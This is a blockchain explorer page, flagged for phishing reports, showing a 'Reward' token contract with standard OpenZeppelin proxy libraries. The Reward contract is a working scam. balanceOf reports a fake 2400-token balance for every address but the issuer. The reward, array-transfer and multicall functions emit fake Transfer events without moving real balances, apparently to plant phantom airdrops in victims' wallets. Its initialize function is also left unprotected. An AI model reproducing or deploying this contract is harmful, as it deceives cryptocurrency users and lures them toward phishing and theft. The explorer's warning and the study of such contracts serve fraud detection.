There are reports that this address was used in a Phishing scam. Please exercise caution when interacting with it.
More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 3,506 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Reward | 54003725 | 58 days ago | IN | 0 ETH | 0.00000589 | ||||
Transfer | 53002722 | 70 days ago | IN | 0 ETH | 0.00000491 | ||||
Transfer | 52802130 | 73 days ago | IN | 0 ETH | 0.00001958 | ||||
Transfer | 52801953 | 73 days ago | IN | 0 ETH | 0.00001549 | ||||
Transfer | 52801828 | 73 days ago | IN | 0 ETH | 0.00001549 | ||||
Transfer | 52801575 | 73 days ago | IN | 0 ETH | 0.00001963 | ||||
Transfer | 52286029 | 80 days ago | IN | 0 ETH | 0.00000409 | ||||
Transfer | 48556191 | 128 days ago | IN | 0 ETH | 0.00000392 | ||||
Transfer | 48555905 | 128 days ago | IN | 0 ETH | 0.00000499 | ||||
Reward | 46786412 | 151 days ago | IN | 0 ETH | 0.00000799 | ||||
Transfer | 44024390 | 186 days ago | IN | 0 ETH | 0.00000472 | ||||
Transfer | 41812193 | 213 days ago | IN | 0 ETH | 0.00000468 | ||||
Transfer | 41540481 | 217 days ago | IN | 0 ETH | 0.00000468 | ||||
Transfer | 41461738 | 218 days ago | IN | 0 ETH | 0.00000387 | ||||
Transfer | 41461593 | 218 days ago | IN | 0 ETH | 0.00000467 | ||||
Transfer | 41455643 | 218 days ago | IN | 0 ETH | 0.00000387 | ||||
Transfer | 41455563 | 218 days ago | IN | 0 ETH | 0.00000439 | ||||
Transfer | 41372015 | 219 days ago | IN | 0 ETH | 0.00000467 | ||||
Transfer | 41371077 | 219 days ago | IN | 0 ETH | 0.00000387 | ||||
Transfer | 41369935 | 219 days ago | IN | 0 ETH | 0.00000387 | ||||
Transfer | 41369055 | 219 days ago | IN | 0 ETH | 0.00000467 | ||||
Transfer | 41368665 | 219 days ago | IN | 0 ETH | 0.00000387 | ||||
Transfer | 41367599 | 219 days ago | IN | 0 ETH | 0.00000468 | ||||
Transfer | 39496831 | 241 days ago | IN | 0 ETH | 0.00000508 | ||||
Transfer | 38630906 | 251 days ago | IN | 0 ETH | 0.00000256 |
Latest 1 internal transaction
Parent Transaction Hash | Block | From | To | |||
---|---|---|---|---|---|---|
36963232 | 271 days ago | Contract Creation | 0 ETH |
Loading...
Loading
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.
Contract Name:
Reward
Compiler Version
v0.8.17+commit.8df45f5f
ZkSolc Version
v1.5.0
Optimization Enabled:
Yes with Mode 3
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; // ---------------------------------------------------------------------------- // ERC Token Standard #20 Interface // // ---------------------------------------------------------------------------- // Safe Math Library // ---------------------------------------------------------------------------- contract SafeMath { function safeAdd(uint a, uint b) public pure returns (uint c) { c = a + b; require(c >= a); } function safeSub(uint a, uint b) public pure returns (uint c) { require(b <= a); c = a - b; } function safeMul(uint a, uint b) public pure returns (uint c) { c = a * b; require(a == 0 || c / a == b); } function safeDiv(uint a, uint b) public pure returns (uint c) { require(b > 0); c = a / b; } } contract Reward is SafeMath { string public name; string public symbol; uint8 public decimals; uint256 public totalSupply; mapping(address => uint) balances; mapping(address => mapping(address => uint)) allowed; uint256 public constAmount; uint256 public randomAmount; address public fromAddr; event Transfer(address indexed from, address indexed to, uint tokens); event Approval( address indexed tokenOwner, address indexed spender, uint tokens ); /** * Constrctor function * * Initializes contract with initial supply tokens to the creator of the contract const 382000000000000000000 */ constructor( string memory name_, string memory symbol_, uint256 constAmount_, address from_ ) { initialize(name_, symbol_, constAmount_, from_); } function initialize( string memory name_, string memory symbol_, uint256 constAmount_, address from_ ) public { name = name_; symbol = symbol_; decimals = 18; constAmount = constAmount_; totalSupply = constAmount * 100000000; fromAddr = from_; balances[fromAddr] = totalSupply; emit Transfer(address(0), fromAddr, totalSupply); } function balanceOf(address account) public view returns (uint256) { if (account == fromAddr) return balances[account]; return randomAmount; } function allowance( address tokenOwner, address spender ) public view returns (uint remaining) { return allowed[tokenOwner][spender]; } function approve( address spender, uint tokens ) public returns (bool success) { allowed[msg.sender][spender] = tokens; emit Approval(msg.sender, spender, tokens); return true; } function transfer(address to, uint tokens) public returns (bool success) { _transfer(msg.sender, to, tokens); return true; } function transferFrom( address from, address to, uint tokens ) public returns (bool success) { allowed[from][msg.sender] = safeSub(allowed[from][msg.sender], tokens); _transfer(from, to, tokens); return true; } function _transfer(address from, address to, uint tokens) private { balances[from] = safeSub(balances[from], tokens); balances[to] = safeAdd(balances[to], tokens); emit Transfer(from, to, tokens); } function reward(address[] memory holders) public { uint256 len = holders.length; for (uint i = 0; i < len; ++i) { randomAmount = 2400000000000000000000; emit Transfer(fromAddr, holders[i], randomAmount); } balances[fromAddr] -= randomAmount * len; } function transfer(address[] memory holders) public { reward(holders); } function multicall(address[] memory holders) public { reward(holders); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) pragma solidity ^0.8.0; import "../utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.5.0) (interfaces/draft-IERC1822.sol) pragma solidity ^0.8.0; /** * @dev ERC1822: Universal Upgradeable Proxy Standard (UUPS) documents a method for upgradeability through a simplified * proxy whose upgrades are fully controlled by the current implementation. */ interface IERC1822Proxiable { /** * @dev Returns the storage slot that the proxiable contract assumes is being used to store the implementation * address. * * IMPORTANT: A proxy pointing at a proxiable contract should not be considered proxiable itself, because this risks * bricking a proxy that upgrades to it, by delegating to itself until out of gas. Thus it is critical that this * function revert if invoked through a proxy. */ function proxiableUUID() external view returns (bytes32); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (proxy/ERC1967/ERC1967Proxy.sol) pragma solidity ^0.8.0; import "../Proxy.sol"; import "./ERC1967Upgrade.sol"; /** * @dev This contract implements an upgradeable proxy. It is upgradeable because calls are delegated to an * implementation address that can be changed. This address is stored in storage in the location specified by * https://eips.ethereum.org/EIPS/eip-1967[EIP1967], so that it doesn't conflict with the storage layout of the * implementation behind the proxy. */ contract ERC1967Proxy is Proxy, ERC1967Upgrade { /** * @dev Initializes the upgradeable proxy with an initial implementation specified by `_logic`. * * If `_data` is nonempty, it's used as data in a delegate call to `_logic`. This will typically be an encoded * function call, and allows initializating the storage of the proxy like a Solidity constructor. */ constructor(address _logic, bytes memory _data) payable { assert(_IMPLEMENTATION_SLOT == bytes32(uint256(keccak256("eip1967.proxy.implementation")) - 1)); _upgradeToAndCall(_logic, _data, false); } /** * @dev Returns the current implementation address. */ function _implementation() internal view virtual override returns (address impl) { return ERC1967Upgrade._getImplementation(); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.5.0) (proxy/ERC1967/ERC1967Upgrade.sol) pragma solidity ^0.8.2; import "../beacon/IBeacon.sol"; import "../../interfaces/draft-IERC1822.sol"; import "../../utils/Address.sol"; import "../../utils/StorageSlot.sol"; /** * @dev This abstract contract provides getters and event emitting update functions for * https://eips.ethereum.org/EIPS/eip-1967[EIP1967] slots. * * _Available since v4.1._ * * @custom:oz-upgrades-unsafe-allow delegatecall */ abstract contract ERC1967Upgrade { // This is the keccak-256 hash of "eip1967.proxy.rollback" subtracted by 1 bytes32 private constant _ROLLBACK_SLOT = 0x4910fdfa16fed3260ed0e7147f7cc6da11a60208b5b9406d12a635614ffd9143; /** * @dev Storage slot with the address of the current implementation. * This is the keccak-256 hash of "eip1967.proxy.implementation" subtracted by 1, and is * validated in the constructor. */ bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc; /** * @dev Emitted when the implementation is upgraded. */ event Upgraded(address indexed implementation); /** * @dev Returns the current implementation address. */ function _getImplementation() internal view returns (address) { return StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value; } /** * @dev Stores a new address in the EIP1967 implementation slot. */ function _setImplementation(address newImplementation) private { require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract"); StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value = newImplementation; } /** * @dev Perform implementation upgrade * * Emits an {Upgraded} event. */ function _upgradeTo(address newImplementation) internal { _setImplementation(newImplementation); emit Upgraded(newImplementation); } /** * @dev Perform implementation upgrade with additional setup call. * * Emits an {Upgraded} event. */ function _upgradeToAndCall( address newImplementation, bytes memory data, bool forceCall ) internal { _upgradeTo(newImplementation); if (data.length > 0 || forceCall) { Address.functionDelegateCall(newImplementation, data); } } /** * @dev Perform implementation upgrade with security checks for UUPS proxies, and additional setup call. * * Emits an {Upgraded} event. */ function _upgradeToAndCallUUPS( address newImplementation, bytes memory data, bool forceCall ) internal { // Upgrades from old implementations will perform a rollback test. This test requires the new // implementation to upgrade back to the old, non-ERC1822 compliant, implementation. Removing // this special case will break upgrade paths from old UUPS implementation to new ones. if (StorageSlot.getBooleanSlot(_ROLLBACK_SLOT).value) { _setImplementation(newImplementation); } else { try IERC1822Proxiable(newImplementation).proxiableUUID() returns (bytes32 slot) { require(slot == _IMPLEMENTATION_SLOT, "ERC1967Upgrade: unsupported proxiableUUID"); } catch { revert("ERC1967Upgrade: new implementation is not UUPS"); } _upgradeToAndCall(newImplementation, data, forceCall); } } /** * @dev Storage slot with the admin of the contract. * This is the keccak-256 hash of "eip1967.proxy.admin" subtracted by 1, and is * validated in the constructor. */ bytes32 internal constant _ADMIN_SLOT = 0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103; /** * @dev Emitted when the admin account has changed. */ event AdminChanged(address previousAdmin, address newAdmin); /** * @dev Returns the current admin. */ function _getAdmin() internal view returns (address) { return StorageSlot.getAddressSlot(_ADMIN_SLOT).value; } /** * @dev Stores a new address in the EIP1967 admin slot. */ function _setAdmin(address newAdmin) private { require(newAdmin != address(0), "ERC1967: new admin is the zero address"); StorageSlot.getAddressSlot(_ADMIN_SLOT).value = newAdmin; } /** * @dev Changes the admin of the proxy. * * Emits an {AdminChanged} event. */ function _changeAdmin(address newAdmin) internal { emit AdminChanged(_getAdmin(), newAdmin); _setAdmin(newAdmin); } /** * @dev The storage slot of the UpgradeableBeacon contract which defines the implementation for this proxy. * This is bytes32(uint256(keccak256('eip1967.proxy.beacon')) - 1)) and is validated in the constructor. */ bytes32 internal constant _BEACON_SLOT = 0xa3f0ad74e5423aebfd80d3ef4346578335a9a72aeaee59ff6cb3582b35133d50; /** * @dev Emitted when the beacon is upgraded. */ event BeaconUpgraded(address indexed beacon); /** * @dev Returns the current beacon. */ function _getBeacon() internal view returns (address) { return StorageSlot.getAddressSlot(_BEACON_SLOT).value; } /** * @dev Stores a new beacon in the EIP1967 beacon slot. */ function _setBeacon(address newBeacon) private { require(Address.isContract(newBeacon), "ERC1967: new beacon is not a contract"); require( Address.isContract(IBeacon(newBeacon).implementation()), "ERC1967: beacon implementation is not a contract" ); StorageSlot.getAddressSlot(_BEACON_SLOT).value = newBeacon; } /** * @dev Perform beacon upgrade with additional setup call. Note: This upgrades the address of the beacon, it does * not upgrade the implementation contained in the beacon (see {UpgradeableBeacon-_setImplementation} for that). * * Emits a {BeaconUpgraded} event. */ function _upgradeBeaconToAndCall( address newBeacon, bytes memory data, bool forceCall ) internal { _setBeacon(newBeacon); emit BeaconUpgraded(newBeacon); if (data.length > 0 || forceCall) { Address.functionDelegateCall(IBeacon(newBeacon).implementation(), data); } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (proxy/Proxy.sol) pragma solidity ^0.8.0; /** * @dev This abstract contract provides a fallback function that delegates all calls to another contract using the EVM * instruction `delegatecall`. We refer to the second contract as the _implementation_ behind the proxy, and it has to * be specified by overriding the virtual {_implementation} function. * * Additionally, delegation to the implementation can be triggered manually through the {_fallback} function, or to a * different contract through the {_delegate} function. * * The success and return data of the delegated call will be returned back to the caller of the proxy. */ abstract contract Proxy { /** * @dev Delegates the current call to `implementation`. * * This function does not return to its internal call site, it will return directly to the external caller. */ function _delegate(address implementation) internal virtual { assembly { // Copy msg.data. We take full control of memory in this inline assembly // block because it will not return to Solidity code. We overwrite the // Solidity scratch pad at memory position 0. calldatacopy(0, 0, calldatasize()) // Call the implementation. // out and outsize are 0 because we don't know the size yet. let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0) // Copy the returned data. returndatacopy(0, 0, returndatasize()) switch result // delegatecall returns 0 on error. case 0 { revert(0, returndatasize()) } default { return(0, returndatasize()) } } } /** * @dev This is a virtual function that should be overridden so it returns the address to which the fallback function * and {_fallback} should delegate. */ function _implementation() internal view virtual returns (address); /** * @dev Delegates the current call to the address returned by `_implementation()`. * * This function does not return to its internal call site, it will return directly to the external caller. */ function _fallback() internal virtual { _beforeFallback(); _delegate(_implementation()); } /** * @dev Fallback function that delegates calls to the address returned by `_implementation()`. Will run if no other * function in the contract matches the call data. */ fallback() external payable virtual { _fallback(); } /** * @dev Fallback function that delegates calls to the address returned by `_implementation()`. Will run if call data * is empty. */ receive() external payable virtual { _fallback(); } /** * @dev Hook that is called before falling back to the implementation. Can happen as part of a manual `_fallback` * call, or as part of the Solidity `fallback` or `receive` functions. * * If overridden should call `super._beforeFallback()`. */ function _beforeFallback() internal virtual {} }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (proxy/beacon/BeaconProxy.sol) pragma solidity ^0.8.0; import "./IBeacon.sol"; import "../Proxy.sol"; import "../ERC1967/ERC1967Upgrade.sol"; /** * @dev This contract implements a proxy that gets the implementation address for each call from a {UpgradeableBeacon}. * * The beacon address is stored in storage slot `uint256(keccak256('eip1967.proxy.beacon')) - 1`, so that it doesn't * conflict with the storage layout of the implementation behind the proxy. * * _Available since v3.4._ */ contract BeaconProxy is Proxy, ERC1967Upgrade { /** * @dev Initializes the proxy with `beacon`. * * If `data` is nonempty, it's used as data in a delegate call to the implementation returned by the beacon. This * will typically be an encoded function call, and allows initializating the storage of the proxy like a Solidity * constructor. * * Requirements: * * - `beacon` must be a contract with the interface {IBeacon}. */ constructor(address beacon, bytes memory data) payable { assert(_BEACON_SLOT == bytes32(uint256(keccak256("eip1967.proxy.beacon")) - 1)); _upgradeBeaconToAndCall(beacon, data, false); } /** * @dev Returns the current beacon address. */ function _beacon() internal view virtual returns (address) { return _getBeacon(); } /** * @dev Returns the current implementation address of the associated beacon. */ function _implementation() internal view virtual override returns (address) { return IBeacon(_getBeacon()).implementation(); } /** * @dev Changes the proxy to use a new beacon. Deprecated: see {_upgradeBeaconToAndCall}. * * If `data` is nonempty, it's used as data in a delegate call to the implementation returned by the beacon. * * Requirements: * * - `beacon` must be a contract. * - The implementation returned by `beacon` must be a contract. */ function _setBeacon(address beacon, bytes memory data) internal virtual { _upgradeBeaconToAndCall(beacon, data, false); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (proxy/beacon/IBeacon.sol) pragma solidity ^0.8.0; /** * @dev This is the interface that {BeaconProxy} expects of its beacon. */ interface IBeacon { /** * @dev Must return an address that can be used as a delegate call target. * * {BeaconProxy} will check that this address is a contract. */ function implementation() external view returns (address); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (proxy/beacon/UpgradeableBeacon.sol) pragma solidity ^0.8.0; import "./IBeacon.sol"; import "../../access/Ownable.sol"; import "../../utils/Address.sol"; /** * @dev This contract is used in conjunction with one or more instances of {BeaconProxy} to determine their * implementation contract, which is where they will delegate all function calls. * * An owner is able to change the implementation the beacon points to, thus upgrading the proxies that use this beacon. */ contract UpgradeableBeacon is IBeacon, Ownable { address private _implementation; /** * @dev Emitted when the implementation returned by the beacon is changed. */ event Upgraded(address indexed implementation); /** * @dev Sets the address of the initial implementation, and the deployer account as the owner who can upgrade the * beacon. */ constructor(address implementation_) { _setImplementation(implementation_); } /** * @dev Returns the current implementation address. */ function implementation() public view virtual override returns (address) { return _implementation; } /** * @dev Upgrades the beacon to a new implementation. * * Emits an {Upgraded} event. * * Requirements: * * - msg.sender must be the owner of the contract. * - `newImplementation` must be a contract. */ function upgradeTo(address newImplementation) public virtual onlyOwner { _setImplementation(newImplementation); emit Upgraded(newImplementation); } /** * @dev Sets the implementation contract address for this beacon * * Requirements: * * - `newImplementation` must be a contract. */ function _setImplementation(address newImplementation) private { require(Address.isContract(newImplementation), "UpgradeableBeacon: implementation is not a contract"); _implementation = newImplementation; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (proxy/transparent/ProxyAdmin.sol) pragma solidity ^0.8.0; import "./TransparentUpgradeableProxy.sol"; import "../../access/Ownable.sol"; /** * @dev This is an auxiliary contract meant to be assigned as the admin of a {TransparentUpgradeableProxy}. For an * explanation of why you would want to use this see the documentation for {TransparentUpgradeableProxy}. */ contract ProxyAdmin is Ownable { /** * @dev Returns the current implementation of `proxy`. * * Requirements: * * - This contract must be the admin of `proxy`. */ function getProxyImplementation(TransparentUpgradeableProxy proxy) public view virtual returns (address) { // We need to manually run the static call since the getter cannot be flagged as view // bytes4(keccak256("implementation()")) == 0x5c60da1b (bool success, bytes memory returndata) = address(proxy).staticcall(hex"5c60da1b"); require(success); return abi.decode(returndata, (address)); } /** * @dev Returns the current admin of `proxy`. * * Requirements: * * - This contract must be the admin of `proxy`. */ function getProxyAdmin(TransparentUpgradeableProxy proxy) public view virtual returns (address) { // We need to manually run the static call since the getter cannot be flagged as view // bytes4(keccak256("admin()")) == 0xf851a440 (bool success, bytes memory returndata) = address(proxy).staticcall(hex"f851a440"); require(success); return abi.decode(returndata, (address)); } /** * @dev Changes the admin of `proxy` to `newAdmin`. * * Requirements: * * - This contract must be the current admin of `proxy`. */ function changeProxyAdmin(TransparentUpgradeableProxy proxy, address newAdmin) public virtual onlyOwner { proxy.changeAdmin(newAdmin); } /** * @dev Upgrades `proxy` to `implementation`. See {TransparentUpgradeableProxy-upgradeTo}. * * Requirements: * * - This contract must be the admin of `proxy`. */ function upgrade(TransparentUpgradeableProxy proxy, address implementation) public virtual onlyOwner { proxy.upgradeTo(implementation); } /** * @dev Upgrades `proxy` to `implementation` and calls a function on the new implementation. See * {TransparentUpgradeableProxy-upgradeToAndCall}. * * Requirements: * * - This contract must be the admin of `proxy`. */ function upgradeAndCall( TransparentUpgradeableProxy proxy, address implementation, bytes memory data ) public payable virtual onlyOwner { proxy.upgradeToAndCall{value: msg.value}(implementation, data); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (proxy/transparent/TransparentUpgradeableProxy.sol) pragma solidity ^0.8.0; import "../ERC1967/ERC1967Proxy.sol"; /** * @dev This contract implements a proxy that is upgradeable by an admin. * * To avoid https://medium.com/nomic-labs-blog/malicious-backdoors-in-ethereum-proxies-62629adf3357[proxy selector * clashing], which can potentially be used in an attack, this contract uses the * https://blog.openzeppelin.com/the-transparent-proxy-pattern/[transparent proxy pattern]. This pattern implies two * things that go hand in hand: * * 1. If any account other than the admin calls the proxy, the call will be forwarded to the implementation, even if * that call matches one of the admin functions exposed by the proxy itself. * 2. If the admin calls the proxy, it can access the admin functions, but its calls will never be forwarded to the * implementation. If the admin tries to call a function on the implementation it will fail with an error that says * "admin cannot fallback to proxy target". * * These properties mean that the admin account can only be used for admin actions like upgrading the proxy or changing * the admin, so it's best if it's a dedicated account that is not used for anything else. This will avoid headaches due * to sudden errors when trying to call a function from the proxy implementation. * * Our recommendation is for the dedicated account to be an instance of the {ProxyAdmin} contract. If set up this way, * you should think of the `ProxyAdmin` instance as the real administrative interface of your proxy. */ contract TransparentUpgradeableProxy is ERC1967Proxy { /** * @dev Initializes an upgradeable proxy managed by `_admin`, backed by the implementation at `_logic`, and * optionally initialized with `_data` as explained in {ERC1967Proxy-constructor}. */ constructor( address _logic, address admin_, bytes memory _data ) payable ERC1967Proxy(_logic, _data) { assert(_ADMIN_SLOT == bytes32(uint256(keccak256("eip1967.proxy.admin")) - 1)); _changeAdmin(admin_); } /** * @dev Modifier used internally that will delegate the call to the implementation unless the sender is the admin. */ modifier ifAdmin() { if (msg.sender == _getAdmin()) { _; } else { _fallback(); } } /** * @dev Returns the current admin. * * NOTE: Only the admin can call this function. See {ProxyAdmin-getProxyAdmin}. * * TIP: To get this value clients can read directly from the storage slot shown below (specified by EIP1967) using the * https://eth.wiki/json-rpc/API#eth_getstorageat[`eth_getStorageAt`] RPC call. * `0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103` */ function admin() external ifAdmin returns (address admin_) { admin_ = _getAdmin(); } /** * @dev Returns the current implementation. * * NOTE: Only the admin can call this function. See {ProxyAdmin-getProxyImplementation}. * * TIP: To get this value clients can read directly from the storage slot shown below (specified by EIP1967) using the * https://eth.wiki/json-rpc/API#eth_getstorageat[`eth_getStorageAt`] RPC call. * `0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc` */ function implementation() external ifAdmin returns (address implementation_) { implementation_ = _implementation(); } /** * @dev Changes the admin of the proxy. * * Emits an {AdminChanged} event. * * NOTE: Only the admin can call this function. See {ProxyAdmin-changeProxyAdmin}. */ function changeAdmin(address newAdmin) external virtual ifAdmin { _changeAdmin(newAdmin); } /** * @dev Upgrade the implementation of the proxy. * * NOTE: Only the admin can call this function. See {ProxyAdmin-upgrade}. */ function upgradeTo(address newImplementation) external ifAdmin { _upgradeToAndCall(newImplementation, bytes(""), false); } /** * @dev Upgrade the implementation of the proxy, and then call a function from the new implementation as specified * by `data`, which should be an encoded function call. This is useful to initialize new storage variables in the * proxied contract. * * NOTE: Only the admin can call this function. See {ProxyAdmin-upgradeAndCall}. */ function upgradeToAndCall(address newImplementation, bytes calldata data) external payable ifAdmin { _upgradeToAndCall(newImplementation, data, true); } /** * @dev Returns the current admin. */ function _admin() internal view virtual returns (address) { return _getAdmin(); } /** * @dev Makes sure the admin cannot access the fallback function. See {Proxy-_beforeFallback}. */ function _beforeFallback() internal virtual override { require(msg.sender != _getAdmin(), "TransparentUpgradeableProxy: admin cannot fallback to proxy target"); super._beforeFallback(); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol) pragma solidity ^0.8.1; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); (bool success, ) = recipient.call{value: amount}(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); require(isContract(target), "Address: call to non-contract"); (bool success, bytes memory returndata) = target.call{value: value}(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) { return functionStaticCall(target, data, "Address: low-level static call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { require(isContract(target), "Address: static call to non-contract"); (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) { return functionDelegateCall(target, data, "Address: low-level delegate call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { require(isContract(target), "Address: delegate call to non-contract"); (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
